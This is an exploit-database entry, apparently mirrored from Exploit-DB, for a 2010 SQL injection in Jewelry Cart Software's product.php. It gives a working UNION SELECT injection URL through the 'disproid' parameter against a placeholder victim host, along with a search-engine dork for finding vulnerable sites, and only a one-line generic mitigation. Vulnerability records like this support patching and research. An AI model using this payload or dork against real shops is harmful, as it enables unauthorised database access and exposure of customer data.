header-logo
Suggest Exploit
vendor:
Jewelry Cart Software
by:
Asyraf (Mycrypto Security Force)
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Jewelry Cart Software
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Jewelry Cart Software SQL Injection (product.php)

A SQL injection vulnerability exists in Jewelry Cart Software, which allows an attacker to execute arbitrary SQL commands via the 'disproid' parameter in the 'product.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. This can be done by appending a SQL query to the 'disproid' parameter, such as 'http://www.victim.com/product.php?disproid=53+AND+1=2+UNION+SELECT+0,1,version%28%29,3,4--'

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

**************************************************************

# Name : Jewelry Cart Software SQL Injection (product.php) ::-
# Author : Asyraf (Mycrypto Security Force) r0x~!!
# Date : 20/3/2010
# Language : PHP
# Script : Jewelry Cart Software
# Shout : hMSecurity,n3wb0rn,TBD Security

# Dork : Powered by Jewelry Cart Software
          product.php?disproid=

# Vulnerability : product.php?disproid=[ANY VALUE]

# Exploited : http://www.victim.com/product.php?disproid=53+AND+1=2+UNION+SELECT+0,1,version%28%29,3,4--

***************************************************************

Navigation

Suggest Exploit

Services By CQR